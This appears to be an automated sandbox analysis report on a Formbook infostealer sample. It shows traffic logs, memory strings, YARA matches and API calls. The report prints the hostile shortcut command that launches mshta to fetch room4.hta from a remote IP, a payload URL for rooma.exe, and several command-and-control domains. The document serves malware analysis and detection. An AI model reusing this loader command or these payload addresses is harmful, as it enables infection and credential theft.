Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569server-timing: processing;dur=13content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a6334d5f-57f5-4f14-bec0-3367a9f2da17-1716488569x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7efsWEkAW5KN724jM4PIt5%2BPnHVXim8zh3om1wxAFVlData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: 0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572server-timing: processing;dur=10content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=0bea04a9-677d-454e-9ce1-24000c7f66ab-1716488572x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BrzTHDOdGwhQJAbFqQqq3IqRQX0H7ZbPYp32%2Fc%2FNM5Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:22:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 311X-Sorting-Hat-ShopId: 87850025272Vary: Accept-Encodingx-frame-options: DENYx-shopid: 87850025272x-shardid: 311x-request-id: b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574server-timing: processing;dur=12content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574x-content-type-options: nosniffx-download-options: noopenx-permitted-cross-domain-policies: nonex-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=b3cfe649-93aa-40c3-9ae7-c601acfe1b1f-1716488574x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1Content-Encoding: gzipCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zAkIpE2UUB1d%2BxlWY3heRgo6geK3PUv9hj7N%2FelFFXData Raw: Data Ascii:
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.8
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.1
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.12
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.2
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.22
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/r
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/ro
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/roo
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/r
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/ro
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/roo
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room
Source: mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp, Offer Document 24.lnk String found in binary or memory: http://20.86.128.223/room/room4.hta
Source: mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta$
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta....=H
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta...H2
Source: mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta4.C:
Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta8N
Source: mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.hta;H
Source: mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaC:
Source: mshta.exe, 00000003.00000002.1489938203.00000237E1260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaFPS_BROWSER_AP
Source: mshta.exe, 00000003.00000002.1489900922.00000237E1230000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaH
Source: mshta.exe, 00000003.00000003.1484607386.0000023FE4512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1482542643.0000023FE44E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483734633.0000023FE44FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1483458080.0000023FE44F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489199159.0000023FE4514000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaLMEMH
Source: mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaY
Source: mshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htao
Source: mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htastricted
Source: mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htat
Source: mshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/room4.htaventindowsINetCookiesIO
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.e
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.ex
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.exe
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.128.223/room/rooma.exep
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65BAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.86.1H2
Source: svchost.exe, 00000008.00000002.3113103128.0000024A08800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.1443968216.0000021E65BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.joyesi.xyz
Source: TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.joyesi.xyz/fo8o/
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: netbtugc.exe, 0000000A.00000002.3839549764.00000000046E6000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003966000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://donnavariedades.com/fo8o?Plm0mn68=l
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: edb.log.8.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1476761679.0000024A08710000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1443968216.0000021E656CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.1443610984.0000021E63FCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co9
Source: mshta.exe, 00000003.00000002.1490295950.00000237E135A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000290C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netbtugc.exe, 0000000A.00000003.1779391791.000000000783F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: netbtugc.exe, 0000000A.00000002.3833651753.00000000028E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003D7A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
Source: powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000004A0A000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003C8A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
Source: netbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&amp;Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prI
Source: netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
Source: netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file Strings: http://20.86.128.223/room/room4.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\rooma.exe
Source: Offer Document 24.lnk LNK file: . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009DB363 NtClose, 7_2_009DB363
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B1D09 NtProtectVirtualMemory, 7_2_009B1D09
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D35C0 NtCreateMutant,LdrInitializeThunk, 7_2_015D35C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2B60 NtClose,LdrInitializeThunk, 7_2_015D2B60
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_015D2DF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_015D2C70
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3010 NtOpenDirectoryObject, 7_2_015D3010
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3090 NtSetValueKey, 7_2_015D3090
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D4340 NtSetContextThread, 7_2_015D4340
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D4650 NtSuspendThread, 7_2_015D4650
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D39B0 NtGetContextThread, 7_2_015D39B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2BF0 NtAllocateVirtualMemory, 7_2_015D2BF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2BE0 NtQueryValueKey, 7_2_015D2BE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2B80 NtQueryInformationFile, 7_2_015D2B80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2BA0 NtEnumerateValueKey, 7_2_015D2BA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2AD0 NtReadFile, 7_2_015D2AD0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2AF0 NtWriteFile, 7_2_015D2AF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2AB0 NtWaitForSingleObject, 7_2_015D2AB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3D70 NtOpenThread, 7_2_015D3D70
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2D10 NtMapViewOfSection, 7_2_015D2D10
